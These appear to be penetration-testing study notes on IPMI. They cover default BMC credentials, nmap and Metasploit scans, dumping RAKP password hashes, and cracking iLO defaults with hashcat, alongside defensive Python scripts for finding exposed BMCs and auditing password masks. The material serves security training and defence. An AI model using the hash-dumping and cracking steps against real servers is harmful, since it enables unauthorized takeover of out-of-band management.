# Pentesting IPMI

## Overview

* Intelligent Platform Management Interface
* Port: UDP 623
* Used for out-of-band remote management of servers (power, console, sensors), independent of the host OS
* Common implementations: Dell iDRAC, HP iLO, Supermicro IPMI

## Default Credentials

| Product         | Username      | Password                            |
| --------------- | ------------- | ----------------------------------- |
| Dell iDRAC      | root          | calvin                              |
| HP iLO          | Administrator | Random 8-char (numbers + uppercase) |
| Supermicro IPMI | ADMIN         | ADMIN                               |

## Scanning

```
sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local
```
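A defender-side use of the same UDP scan is to compare the result against the inventory of BMCs that should be reachable from the scanning vantage point, so that any IPMI listener outside the isolated management network stands out. The script below is an added example, not from the original notes: it parses nmap's grepable (`-oG`) output and reports hosts answering on 623/udp that are not in a `known_bmcs` allowlist. The sample scan output is constructed (the `10.129.42.x` addresses reuse the subnet from the notes; `asf-rmcp` is the service name nmap assigns to port 623).

```python
"""Find hosts that answer IPMI (UDP 623) in nmap grepable output.

Added example for these notes, not from the original page: a defender runs
the same UDP scan with `-oG` and checks the result against the list of
BMCs that are supposed to live on the isolated management network.
"""
import re

# Constructed sample output (not a real scan) in nmap's -oG format, as from:
#   sudo nmap -sU -p 623 -oG - 10.129.42.0/24
SAMPLE_GREPABLE = """\
# Nmap 7.94 scan initiated ... as: nmap -sU -p 623 -oG - 10.129.42.0/24
Host: 10.129.42.195 ()\tStatus: Up
Host: 10.129.42.195 ()\tPorts: 623/open/udp//asf-rmcp///\tIgnored State: closed (0)
Host: 10.129.42.196 ()\tStatus: Up
Host: 10.129.42.196 ()\tPorts: 623/open|filtered/udp//asf-rmcp///\tIgnored State: closed (0)
Host: 10.129.42.197 ()\tStatus: Up
Host: 10.129.42.197 ()\tPorts: 623/closed/udp//asf-rmcp///\tIgnored State: closed (0)
# Nmap done at ... -- 256 IP addresses (3 hosts up) scanned
"""

# One -oG port entry: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/([^/]+)/([^/]+)/([^/]*)/([^/]*)/")


def parse_grepable(text):
    """Return one dict per port entry found on 'Host:' lines."""
    records = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        # Each line is a tab-separated list of 'Key: value' fields
        fields = {}
        for field in line.split("\t"):
            key, _, value = field.partition(": ")
            fields[key] = value
        host = fields["Host"].split()[0]
        for entry in fields.get("Ports", "").split(","):
            m = PORT_RE.match(entry.strip())
            if m:
                records.append({
                    "host": host,
                    "port": int(m.group(1)),
                    "state": m.group(2),
                    "proto": m.group(3),
                    "service": m.group(5),
                })
    return records


def exposed_ipmi_hosts(records, known_bmcs=()):
    """Hosts answering on 623/udp that are not in the inventory of BMCs
    expected to be reachable from the scanning vantage point.
    open|filtered is kept: UDP scans often cannot tell the two apart."""
    return sorted(
        {r["host"] for r in records
         if r["port"] == 623 and r["proto"] == "udp"
         and r["state"] in ("open", "open|filtered")
         and r["host"] not in known_bmcs}
    )


if __name__ == "__main__":
    recs = parse_grepable(SAMPLE_GREPABLE)
    for host in exposed_ipmi_hosts(recs, known_bmcs={"10.129.42.195"}):
        print(f"{host}: IPMI reachable but not in the BMC inventory")
```

Hosts reported by `exposed_ipmi_hosts` are candidates for moving onto the management VLAN or for an ACL on the BMC itself; `open|filtered` results should be confirmed with the `ipmi-version` script before being closed out as false positives.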

## Metasploit Version Scan

```
use auxiliary/scanner/ipmi/ipmi_version
set rhosts 10.129.42.195
run
```

## Hash Dumping (IPMI 2.0 RAKP Flaw)

* During IPMI 2.0 (RAKP) authentication, the BMC sends an HMAC (SHA1 or MD5) keyed with the user's password, commonly described as a salted hash of the password, before the client has proven it knows the password
* Anyone who can reach UDP 623 and supplies a valid username can retrieve this value and crack it offline; there is no patch, so the mitigation is network isolation of the BMC plus strong passwords

```
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts 10.129.42.195
run
```

## Cracking IPMI Hashes

```
hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
```

* HP iLO factory-default passwords are 8 characters of uppercase letters and digits, so the mask `?1?1?1?1?1?1?1?1` with the custom charset `-1 ?d?u` (digits plus uppercase) covers exactly that keyspace

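To see why a default-style password is cheap to crack, it helps to understand the mask syntax: `?d`, `?u`, `?l`, `?s`, `?a` are hashcat's built-in charsets, `-1 ?d?u` defines custom charset `?1`, and each `?1` in the mask is one position drawn from that charset, so the keyspace is 36^8. The following is an added example, not from the original notes: a small parser for that mask syntax that computes the keyspace of a mask, checks whether a given password falls inside it, and turns the keyspace into a time estimate. The `guesses_per_second` figure is a constructed placeholder, not a benchmark; the `??` literal and `-1`..`-4` chaining follow hashcat's documented behaviour.

```python
"""Hashcat mask parser: keyspace and password-in-mask check.

Added example (not from the original notes). Understands hashcat's built-in
charsets (?l ?u ?d ?s ?h ?H ?a), custom charsets ?1..?4 as given with
-1/-2/-3/-4, '??' as a literal question mark, and literal characters.
"""
import string

# hashcat built-in charsets (?a is the union of ?l ?u ?d ?s)
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def _positions(spec, custom):
    """Tokenise a mask or charset spec into one charset string per position."""
    out, i = [], 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":
                out.append("?")               # '??' is a literal '?'
            elif key in BUILTIN:
                out.append(BUILTIN[key])
            elif key in custom:
                out.append(custom[key])
            else:
                raise ValueError(f"unknown charset ?{key} in {spec!r}")
            i += 2
        else:
            out.append(spec[i])               # literal character, keyspace 1
            i += 1
    return out


def build_custom(custom_specs):
    """Expand -1/-2/-3/-4 definitions such as {'1': '?d?u'} into strings.
    Later definitions may reference earlier ones (e.g. -2 ?1?s)."""
    custom = {}
    for key, spec in (custom_specs or {}).items():
        chars = "".join(_positions(spec, custom))
        custom[key] = "".join(dict.fromkeys(chars))  # de-duplicate, keep order
    return custom


def parse_mask(mask, custom_specs=None):
    """List of per-position charsets for a mask like '?1?1?1?1?1?1?1?1'."""
    return _positions(mask, build_custom(custom_specs))


def keyspace(mask, custom_specs=None):
    """Number of candidates the mask generates (product of charset sizes)."""
    n = 1
    for charset in parse_mask(mask, custom_specs):
        n *= len(charset)
    return n


def password_in_mask(password, mask, custom_specs=None):
    """True if the password is one of the candidates the mask would try."""
    positions = parse_mask(mask, custom_specs)
    return len(password) == len(positions) and all(
        ch in charset for ch, charset in zip(password, positions))


def seconds_to_exhaust(mask, guesses_per_second, custom_specs=None):
    """Worst-case time to walk the whole keyspace at a given guess rate."""
    return keyspace(mask, custom_specs) / guesses_per_second


if __name__ == "__main__":
    ilo_mask, ilo_custom = "?1?1?1?1?1?1?1?1", {"1": "?d?u"}
    print("keyspace:", keyspace(ilo_mask, ilo_custom))
    # constructed rate, for illustration only
    print("hours at 1e9 guesses/s:",
          round(seconds_to_exhaust(ilo_mask, 1e9, ilo_custom) / 3600, 2))
    for pw in ("A7K2P9QX", "calvin", "a7k2p9qx"):
        print(pw, "in mask:", password_in_mask(pw, ilo_mask, ilo_custom))
```

`password_in_mask` is the useful part for a defender: run it over the masks an attacker would try first (the iLO default shape, all-digit PINs, a single dictionary word) when setting or auditing BMC passwords, and treat any hit as a password that the RAKP hash leak turns into a short offline job.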